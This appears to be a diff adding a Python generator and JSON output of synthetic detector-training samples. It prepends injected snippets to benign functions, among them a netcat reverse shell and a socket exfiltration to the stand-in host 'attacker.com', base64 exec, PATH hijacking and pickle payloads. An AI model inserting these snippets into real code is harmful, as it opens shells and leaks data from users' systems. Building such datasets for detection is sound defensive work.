counts = {}
|
| 5 |
+
for word in words:
|
| 6 |
+
counts[word] = counts.get(word, 0) + 1
|
| 7 |
+
return counts
|
sentinel_synth/data/generate_scenarios.py
ADDED
|
@@ -0,0 +1,253 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import os
|
| 2 |
+
import json
|
| 3 |
+
import random
|
| 4 |
+
import subprocess
|
| 5 |
+
import tempfile
|
| 6 |
+
import uuid
|
| 7 |
+
from pathlib import Path
|
| 8 |
+
|
| 9 |
+
# ============================================================
|
| 10 |
+
# Attack Templates for Mutation Engine (Track B)
|
| 11 |
+
# ============================================================
|
| 12 |
+
ATTACK_TEMPLATES = {
|
| 13 |
+
"typosquatting": {
|
| 14 |
+
"inject": "import pythonn\n\n",
|
| 15 |
+
"patch": "",
|
| 16 |
+
},
|
| 17 |
+
"obfuscated_exec": {
|
| 18 |
+
"inject": "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\n",
|
| 19 |
+
"patch": "",
|
| 20 |
+
},
|
| 21 |
+
"env_hijack": {
|
| 22 |
+
"inject": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\n",
|
| 23 |
+
"patch": "",
|
| 24 |
+
},
|
| 25 |
+
"subprocess_backdoor": {
|
| 26 |
+
"inject": "import subprocess\ntry:\n subprocess.call(['nc', '-e', '/bin/sh', 'attacker.com', '4444'])\nexcept:\n pass\n\n",
|
| 27 |
+
"patch": "",
|
| 28 |
+
},
|
| 29 |
+
"eval_hidden": {
|
| 30 |
+
"inject": "def safe_eval(x):\n return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\n",
|
| 31 |
+
"patch": "",
|
| 32 |
+
},
|
| 33 |
+
"pickle_deserialization": {
|
| 34 |
+
"inject": "import pickle\npickle.loads(b\"c__builtin__\\neval\\n(Vprint('malicious')\\ntR.\")\n\n",
|
| 35 |
+
"patch": "",
|
| 36 |
+
},
|
| 37 |
+
"socket_exfil": {
|
| 38 |
+
"inject": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\n",
|
| 39 |
+
"patch": "",
|
| 40 |
+
},
|
| 41 |
+
"malicious_import": {
|
| 42 |
+
"inject": "__import__('os').system('echo pwned > /tmp/pwned')\n\n",
|
| 43 |
+
"patch": ""
|
| 44 |
+
}
|
| 45 |
+
}
|
| 46 |
+
|
| 47 |
+
def load_benign_files(benign_dir):
|
| 48 |
+
files_data = []
|
| 49 |
+
if not os.path.exists(benign_dir):
|
| 50 |
+
return files_data
|
| 51 |
+
for filename in os.listdir(benign_dir):
|
| 52 |
+
if filename.endswith(".py"):
|
| 53 |
+
with open(os.path.join(benign_dir, filename), "r") as f:
|
| 54 |
+
content = f.read()
|
| 55 |
+
files_data.append({"filename": filename, "code": content})
|
| 56 |
+
return files_data
|
| 57 |
+
|
| 58 |
+
def auto_generate_unit_test(filename, code):
|
| 59 |
+
"""Generates a simple unit test that passes when run against the patched code."""
|
| 60 |
+
test_code = "import code\n"
|
| 61 |
+
if "fibonacci" in code:
|
| 62 |
+
test_code += "assert code.fibonacci(5) == 5\n"
|
| 63 |
+
elif "factorial" in code:
|
| 64 |
+
test_code += "assert code.factorial(5) == 120\n"
|
| 65 |
+
elif "is_prime" in code:
|
| 66 |
+
test_code += "assert code.is_prime(7) == True\n"
|
| 67 |
+
elif "gcd" in code:
|
| 68 |
+
test_code += "assert code.gcd(48, 18) == 6\n"
|
| 69 |
+
elif "is_palindrome" in code:
|
| 70 |
+
test_code += "assert code.is_palindrome('racecar') == True\n"
|
| 71 |
+
elif "celsius_to_fahrenheit" in code:
|
| 72 |
+
test_code += "assert code.celsius_to_fahrenheit(0) == 32\n"
|
| 73 |
+
else:
|
| 74 |
+
# Minimal test: just ensure the module loads without error
|
| 75 |
+
test_code += "assert True # module loaded successfully\n"
|
| 76 |
+
return test_code
|
| 77 |
+
|
| 78 |
+
def generate_track_b_scenarios(benign_files, num_examples=40):
|
| 79 |
+
"""Track B: Custom mutation engine (always used)."""
|
| 80 |
+
scenarios = []
|
| 81 |
+
# True Positives (20)
|
| 82 |
+
for i in range(20):
|
| 83 |
+
bf = random.choice(benign_files)
|
| 84 |
+
attack_name, attack_data = random.choice(list(ATTACK_TEMPLATES.items()))
|
| 85 |
+
malicious_code = attack_data["inject"] + bf["code"]
|
| 86 |
+
test_code = auto_generate_unit_test(bf["filename"], bf["code"])
|
| 87 |
+
scenarios.append({
|
| 88 |
+
"id": f"tp_{uuid.uuid4().hex[:8]}",
|
| 89 |
+
"type": "true_positive",
|
| 90 |
+
"code_snippet": malicious_code,
|
| 91 |
+
"patch": bf["code"],
|
| 92 |
+
"unit_test_code": test_code,
|
| 93 |
+
"label": "malicious",
|
| 94 |
+
"source": "mutation_engine",
|
| 95 |
+
"attack_type": attack_name
|
| 96 |
+
})
|
| 97 |
+
# False Positives (10)
|
| 98 |
+
fp_templates = [
|
| 99 |
+
("fp_eval", "def safe_calc(expr):\n # Legit eval in controlled env\n return eval(expr, {'__builtins__': {}}, {})\n\n"),
|
| 100 |
+
("fp_requests", "import requests\n# Just checking internet\ntry:\n requests.get('https://8.8.8.8', timeout=1)\nexcept:\n pass\n\n"),
|
| 101 |
+
("fp_os_environ", "import os\n# Setup proxy\nos.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\n"),
|
| 102 |
+
("fp_base64", "import base64\ndef encode_msg(msg):\n return base64.b64encode(msg.encode())\n\n")
|
| 103 |
+
]
|
| 104 |
+
for i in range(10):
|
| 105 |
+
bf = random.choice(benign_files)
|
| 106 |
+
fp_name, fp_code = random.choice(fp_templates)
|
| 107 |
+
suspicious_code = fp_code + bf["code"]
|
| 108 |
+
test_code = auto_generate_unit_test(bf["filename"], bf["code"])
|
| 109 |
+
scenarios.append({
|
| 110 |
+
"id": f"fp_{uuid.uuid4().hex[:8]}",
|
| 111 |
+
"type": "false_positive",
|
| 112 |
+
"code_snippet": suspicious_code,
|
| 113 |
+
"patch": None,
|
| 114 |
+
"unit_test_code": test_code,
|
| 115 |
+
"label": "benign",
|
| 116 |
+
"source": "mutation_engine",
|
| 117 |
+
"attack_type": None
|
| 118 |
+
})
|
| 119 |
+
# Functional (10)
|
| 120 |
+
for i in range(10):
|
| 121 |
+
bf = random.choice(benign_files)
|
| 122 |
+
test_code = auto_generate_unit_test(bf["filename"], bf["code"])
|
| 123 |
+
scenarios.append({
|
| 124 |
+
"id": f"fn_{uuid.uuid4().hex[:8]}",
|
| 125 |
+
"type": "functional",
|
| 126 |
+
"code_snippet": bf["code"],
|
| 127 |
+
"patch": None,
|
| 128 |
+
"unit_test_code": test_code,
|
| 129 |
+
"label": "benign",
|
| 130 |
+
"source": "mutation_engine",
|
| 131 |
+
"attack_type": None
|
| 132 |
+
})
|
| 133 |
+
return scenarios
|
| 134 |
+
|
| 135 |
+
def generate_track_a_scenarios_with_sdk(output_dir: str, num_samples: int = 10):
|
| 136 |
+
"""
|
| 137 |
+
Track A: Use Meta's synthetic-data-kit to generate high-quality code examples.
|
| 138 |
+
Follows the 4-stage pipeline: ingest -> create -> curate -> save-as
|
| 139 |
+
"""
|
| 140 |
+
sdk_scenarios = []
|
| 141 |
+
|
| 142 |
+
# Check if synthetic-data-kit CLI is available
|
| 143 |
+
try:
|
| 144 |
+
subprocess.run(["synthetic-data-kit", "--help"], capture_output=True, check=True)
|
| 145 |
+
except (subprocess.SubprocessError, FileNotFoundError):
|
| 146 |
+
print("⚠️ Meta synthetic-data-kit CLI not found. Track A disabled.")
|
| 147 |
+
return sdk_scenarios
|
| 148 |
+
|
| 149 |
+
# Path to our SDK config
|
| 150 |
+
config_path = Path(__file__).parent / "sdk_config.yaml"
|
| 151 |
+
if not config_path.exists():
|
| 152 |
+
print(f"⚠️ SDK config not found at {config_path}. Track A disabled.")
|
| 153 |
+
return sdk_scenarios
|
| 154 |
+
|
| 155 |
+
# Create a temporary directory for the SDK workspace
|
| 156 |
+
with tempfile.TemporaryDirectory() as tmpdir:
|
| 157 |
+
tmp_path = Path(tmpdir)
|
| 158 |
+
workspace_dir = tmp_path / "sdk_workspace"
|
| 159 |
+
workspace_dir.mkdir()
|
| 160 |
+
|
| 161 |
+
# 1. Ingest (We'll ingest the benign files as seeds)
|
| 162 |
+
try:
|
| 163 |
+
benign_dir = Path(__file__).parent / "benign"
|
| 164 |
+
if benign_dir.exists():
|
| 165 |
+
subprocess.run(
|
| 166 |
+
["synthetic-data-kit", "ingest", str(benign_dir), "--output", str(workspace_dir / "ingested")],
|
| 167 |
+
check=True, capture_output=True
|
| 168 |
+
)
|
| 169 |
+
|
| 170 |
+
# 2. Create (Generate synthetic examples)
|
| 171 |
+
subprocess.run(
|
| 172 |
+
["synthetic-data-kit", "create", str(workspace_dir / "ingested"),
|
| 173 |
+
"--type", "qa", "-c", str(config_path), "--output", str(workspace_dir / "created")],
|
| 174 |
+
check=True, capture_output=True, timeout=600
|
| 175 |
+
)
|
| 176 |
+
|
| 177 |
+
# 3. Curate (Filter low-quality examples)
|
| 178 |
+
subprocess.run(
|
| 179 |
+
["synthetic-data-kit", "curate", str(workspace_dir / "created"),
|
| 180 |
+
"--output", str(workspace_dir / "curated")],
|
| 181 |
+
check=True, capture_output=True
|
| 182 |
+
)
|
| 183 |
+
|
| 184 |
+
# 4. Save-As (Export to JSON)
|
| 185 |
+
output_json = workspace_dir / "final_sdk.json"
|
| 186 |
+
subprocess.run(
|
| 187 |
+
["synthetic-data-kit", "save-as", str(workspace_dir / "curated"),
|
| 188 |
+
"--format", "json", "--output", str(output_json)],
|
| 189 |
+
check=True, capture_output=True
|
| 190 |
+
)
|
| 191 |
+
|
| 192 |
+
# Load generated data and convert to our format
|
| 193 |
+
if output_json.exists():
|
| 194 |
+
with open(output_json, "r") as f:
|
| 195 |
+
data = json.load(f)
|
| 196 |
+
for item in data:
|
| 197 |
+
# Expecting keys based on sdk_config.yaml prompts
|
| 198 |
+
sdk_scenarios.append({
|
| 199 |
+
"id": f"tp_sdk_{uuid.uuid4().hex[:8]}",
|
| 200 |
+
"type": "true_positive" if item.get("patch") else "functional",
|
| 201 |
+
"code_snippet": item.get("code_snippet") or item.get("code"),
|
| 202 |
+
"patch": item.get("patch"),
|
| 203 |
+
"unit_test_code": item.get("unit_test_code", "import code\nassert True"),
|
| 204 |
+
"label": "malicious" if item.get("patch") else "benign",
|
| 205 |
+
"source": "synthetic_data_kit",
|
| 206 |
+
"attack_type": item.get("attack_type", "llm_generated")
|
| 207 |
+
})
|
| 208 |
+
except subprocess.TimeoutExpired:
|
| 209 |
+
print("⚠️ SDK generation timed out.")
|
| 210 |
+
except subprocess.CalledProcessError as e:
|
| 211 |
+
print(f"⚠️ SDK command failed: {e.stderr.decode() if e.stderr else 'Unknown error'}")
|
| 212 |
+
|
| 213 |
+
return sdk_scenarios
|
| 214 |
+
|
| 215 |
+
def main():
|
| 216 |
+
import argparse
|
| 217 |
+
parser = argparse.ArgumentParser()
|
| 218 |
+
parser.add_argument("--benign-dir", type=str, default="sentinel_synth/data/benign/")
|
| 219 |
+
parser.add_argument("--output", type=str, default="sentinel_synth/data/scenarios.json")
|
| 220 |
+
parser.add_argument("--use-sdk", action="store_true", help="Use Meta synthetic-data-kit (requires `synth` CLI)")
|
| 221 |
+
parser.add_argument("--sdk-samples", type=int, default=10, help="Number of SDK samples to generate")
|
| 222 |
+
args = parser.parse_args()
|
| 223 |
+
|
| 224 |
+
benign_files = load_benign_files(args.benign_dir)
|
| 225 |
+
if not benign_files:
|
| 226 |
+
print(f"No benign files found in {args.benign_dir}. Create some first.")
|
| 227 |
+
return
|
| 228 |
+
|
| 229 |
+
# Start with Track B scenarios (mutation engine)
|
| 230 |
+
scenarios = generate_track_b_scenarios(benign_files, 40)
|
| 231 |
+
|
| 232 |
+
# Add Track A (Meta SDK) if requested
|
| 233 |
+
if args.use_sdk:
|
| 234 |
+
# Note: output_dir is passed implicitly via creating a temp dir inside the fxn now
|
| 235 |
+
# the argument `args.output` is where final aggregated data is saved
|
| 236 |
+
sdk_scenarios = generate_track_a_scenarios_with_sdk(os.path.dirname(args.output), args.sdk_samples)
|
| 237 |
+
scenarios.extend(sdk_scenarios)
|
| 238 |
+
if sdk_scenarios:
|
| 239 |
+
print(f"Added {len(sdk_scenarios)} SDK-generated scenarios.")
|
| 240 |
+
|
| 241 |
+
# Shuffle and save
|
| 242 |
+
random.shuffle(scenarios)
|
| 243 |
+
os.makedirs(os.path.dirname(args.output), exist_ok=True)
|
| 244 |
+
with open(args.output, "w") as f:
|
| 245 |
+
json.dump(scenarios, f, indent=4)
|
| 246 |
+
|
| 247 |
+
print(f"Total scenarios: {len(scenarios)}")
|
| 248 |
+
print(f" Malicious: {len([s for s in scenarios if s['label'] == 'malicious'])}")
|
| 249 |
+
print(f" Benign: {len([s for s in scenarios if s['label'] == 'benign'])}")
|
| 250 |
+
print(f"Saved to {args.output}")
|
| 251 |
+
|
| 252 |
+
if __name__ == "__main__":
|
| 253 |
+
main()
|
sentinel_synth/data/scenarios.json
ADDED
|
@@ -0,0 +1,402 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
[
|
| 2 |
+
{
|
| 3 |
+
"id": "fp_4cc36ade",
|
| 4 |
+
"type": "false_positive",
|
| 5 |
+
"code_snippet": "import os\n# Setup proxy\nos.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\ndef matrix_addition(mat1, mat2):\n \"\"\"Add two matrices.\"\"\"\n return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]",
|
| 6 |
+
"patch": null,
|
| 7 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 8 |
+
"label": "benign",
|
| 9 |
+
"source": "mutation_engine",
|
| 10 |
+
"attack_type": null
|
| 11 |
+
},
|
| 12 |
+
{
|
| 13 |
+
"id": "fp_dd7e5a4d",
|
| 14 |
+
"type": "false_positive",
|
| 15 |
+
"code_snippet": "def safe_calc(expr):\n # Legit eval in controlled env\n return eval(expr, {'__builtins__': {}}, {})\n\ndef caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
|
| 16 |
+
"patch": null,
|
| 17 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 18 |
+
"label": "benign",
|
| 19 |
+
"source": "mutation_engine",
|
| 20 |
+
"attack_type": null
|
| 21 |
+
},
|
| 22 |
+
{
|
| 23 |
+
"id": "tp_7ffae123",
|
| 24 |
+
"type": "true_positive",
|
| 25 |
+
"code_snippet": "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\ndef bubble_sort(arr):\n \"\"\"Sort an array using bubble sort.\"\"\"\n n = len(arr)\n for i in range(n):\n for j in range(0, n-i-1):\n if arr[j] > arr[j+1]:\n arr[j], arr[j+1] = arr[j+1], arr[j]\n return arr",
|
| 26 |
+
"patch": "def bubble_sort(arr):\n \"\"\"Sort an array using bubble sort.\"\"\"\n n = len(arr)\n for i in range(n):\n for j in range(0, n-i-1):\n if arr[j] > arr[j+1]:\n arr[j], arr[j+1] = arr[j+1], arr[j]\n return arr",
|
| 27 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 28 |
+
"label": "malicious",
|
| 29 |
+
"source": "mutation_engine",
|
| 30 |
+
"attack_type": "obfuscated_exec"
|
| 31 |
+
},
|
| 32 |
+
{
|
| 33 |
+
"id": "fp_6ab25c4e",
|
| 34 |
+
"type": "false_positive",
|
| 35 |
+
"code_snippet": "import os\n# Setup proxy\nos.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\ndef factorial(n):\n \"\"\"Calculate the factorial of a number.\"\"\"\n if n == 0:\n return 1\n return n * factorial(n - 1)",
|
| 36 |
+
"patch": null,
|
| 37 |
+
"unit_test_code": "import code\nassert code.factorial(5) == 120\n",
|
| 38 |
+
"label": "benign",
|
| 39 |
+
"source": "mutation_engine",
|
| 40 |
+
"attack_type": null
|
| 41 |
+
},
|
| 42 |
+
{
|
| 43 |
+
"id": "tp_c9e41cb4",
|
| 44 |
+
"type": "true_positive",
|
| 45 |
+
"code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef matrix_addition(mat1, mat2):\n \"\"\"Add two matrices.\"\"\"\n return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]",
|
| 46 |
+
"patch": "def matrix_addition(mat1, mat2):\n \"\"\"Add two matrices.\"\"\"\n return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]",
|
| 47 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 48 |
+
"label": "malicious",
|
| 49 |
+
"source": "mutation_engine",
|
| 50 |
+
"attack_type": "env_hijack"
|
| 51 |
+
},
|
| 52 |
+
{
|
| 53 |
+
"id": "tp_5593ef6c",
|
| 54 |
+
"type": "true_positive",
|
| 55 |
+
"code_snippet": "__import__('os').system('echo pwned > /tmp/pwned')\n\ndef render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
|
| 56 |
+
"patch": "def render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
|
| 57 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 58 |
+
"label": "malicious",
|
| 59 |
+
"source": "mutation_engine",
|
| 60 |
+
"attack_type": "malicious_import"
|
| 61 |
+
},
|
| 62 |
+
{
|
| 63 |
+
"id": "fn_69406790",
|
| 64 |
+
"type": "functional",
|
| 65 |
+
"code_snippet": "def caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
|
| 66 |
+
"patch": null,
|
| 67 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 68 |
+
"label": "benign",
|
| 69 |
+
"source": "mutation_engine",
|
| 70 |
+
"attack_type": null
|
| 71 |
+
},
|
| 72 |
+
{
|
| 73 |
+
"id": "tp_76aa219b",
|
| 74 |
+
"type": "true_positive",
|
| 75 |
+
"code_snippet": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\ndef word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
|
| 76 |
+
"patch": "def word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
|
| 77 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 78 |
+
"label": "malicious",
|
| 79 |
+
"source": "mutation_engine",
|
| 80 |
+
"attack_type": "socket_exfil"
|
| 81 |
+
},
|
| 82 |
+
{
|
| 83 |
+
"id": "fp_661ae03e",
|
| 84 |
+
"type": "false_positive",
|
| 85 |
+
"code_snippet": "import requests\n# Just checking internet\ntry:\n requests.get('https://8.8.8.8', timeout=1)\nexcept:\n pass\n\nclass Queue:\n \"\"\"A simple queue implementation.\"\"\"\n def __init__(self):\n self.items = []\n \n def enqueue(self, item):\n self.items.insert(0, item)\n \n def dequeue(self):\n if not self.is_empty():\n return self.items.pop()\n return None\n \n def is_empty(self):\n return len(self.items) == 0",
|
| 86 |
+
"patch": null,
|
| 87 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 88 |
+
"label": "benign",
|
| 89 |
+
"source": "mutation_engine",
|
| 90 |
+
"attack_type": null
|
| 91 |
+
},
|
| 92 |
+
{
|
| 93 |
+
"id": "fn_afb2fb13",
|
| 94 |
+
"type": "functional",
|
| 95 |
+
"code_snippet": "def read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
|
| 96 |
+
"patch": null,
|
| 97 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 98 |
+
"label": "benign",
|
| 99 |
+
"source": "mutation_engine",
|
| 100 |
+
"attack_type": null
|
| 101 |
+
},
|
| 102 |
+
{
|
| 103 |
+
"id": "fn_7d9c3863",
|
| 104 |
+
"type": "functional",
|
| 105 |
+
"code_snippet": "def binary_search(arr, target):\n \"\"\"Perform binary search.\"\"\"\n low = 0\n high = len(arr) - 1\n while low <= high:\n mid = (low + high) // 2\n if arr[mid] == target:\n return mid\n elif arr[mid] < target:\n low = mid + 1\n else:\n high = mid - 1\n return -1",
|
| 106 |
+
"patch": null,
|
| 107 |
+
"unit_test_code": "import code\nassert True # module loaded successfully\n",
|
| 108 |
+
"label": "benign",
|
| 109 |
+
"source": "mutation_engine",
|
| 110 |
+
"attack_type": null
|
| 111 |
+
},
|
| 112 |
+
{
|
| 113 |
+
"id": "fn_81a53eff",
|
| 114 |
+
"type": "functional",
|
| 115 |
+
"code_snippet": "def render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
|
